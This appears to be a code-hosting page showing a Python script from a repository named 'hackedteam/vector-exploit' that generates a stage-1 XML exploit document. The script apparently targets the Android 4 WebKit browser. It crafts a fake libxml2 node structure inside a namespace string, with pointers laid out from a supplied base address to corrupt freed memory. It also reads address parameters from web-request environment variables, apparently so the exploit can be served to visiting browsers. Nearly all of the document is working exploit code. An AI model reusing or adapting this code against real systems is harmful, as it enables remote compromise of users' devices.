hackedteam/vector-exploit

View on GitHub
src/ht-webkit-Android4-src/precompiled/debug/stage1_xml.py

Summary

Maintainability
F
4 days
Test Coverage
#!/usr/bin/python

# stage1_xml generates the correct XML stage1 exploit document based on
# the base address specified as a parameter

import sys
import os
import struct

class InvalidParameterError(Exception):
    pass

def toascii(data):
    """
    Encodes a 32-bit integer as an ascii string. raises InvalidParameterError
    in case of errors.
    """

    if data > 0xffffffff or data < 0:
        raise InvalidParameterError("Value out of range")

    packed = struct.pack("<I", data)
    
    return packed
    
def stage1_xml(base=0x6b503000, nextaddr=None):
    """
    Generates the exploit XML document. The parameter base must be an integer.
    """

    # Vulnerable string (struct _xmlNode)
    ns = ""
    ns += "XXXX"                # _private
    ns += "YYYY"                # type
    ns += toascii(base + 0x230) # name (DICT_FREE'd)
    ns += toascii(base + 0x130) # children
    ns += "LLLL"                # last
    ns += toascii(base + 0x44)  # parent (must be valid memory, field is zeroed)
    if nextaddr is None:
        ns += toascii(base + 0x44)  # next (field is zeroed)
    else:
        ns += toascii(nextaddr)
    ns += toascii(base + 0x70)  # prev (field is zeroed)
    ns += toascii(base + 0x34)  # doc
    ns += "NNNN"                # ns
    ns += toascii(base + 0x230) # content (DICT_FREE'd)
    ns += "PPPP"                # properties
    ns += "DDDD"                # nsDef
    ns += "pppp"                # psvi
    ns += "ll"                  # line
    ns += "ee"                  # extra

    nsname = "basebandName"
    nsuri = "basebandURI"

    # Generate the document as a string
    
    # NOTE: in order for the exploit to behave correctly, the document
    # element (the element the namespace is defined in) MUST NOT BE on
    # line 1 (here it is on line 3)
    document = ""
    document += '<?xml version="1.0" encoding="UTF-8"?>\n'
    document += '<?xml-stylesheet type="text/xsl" href="stylesheet.xsl"?>\n'
    document += '<{ns}:{nsuri} xmlns:{ns}="{nsname}">roottext<root/></{ns}:{nsuri}>'.format(
        ns=ns, nsname=nsname, nsuri=nsuri
    )
    document += '\n'
    
    return document

# [ Standalone script usage ] ------------------------------------------------ #

def main():
    env = os.environ
    base = env.get('_REQUEST__id')
    nextaddr = env.get('_REQUEST__contentId')
    
    if base is None:
        return

    try:
        base = int(base)
    except ValueError:
        return

    if nextaddr is not None:
        try:
            nextaddr = int(nextaddr)
        except ValueError:
            nextaddr = None

    data = stage1_xml(base, nextaddr)
    sys.stdout.write(data)

if __name__ == "__main__":
    main()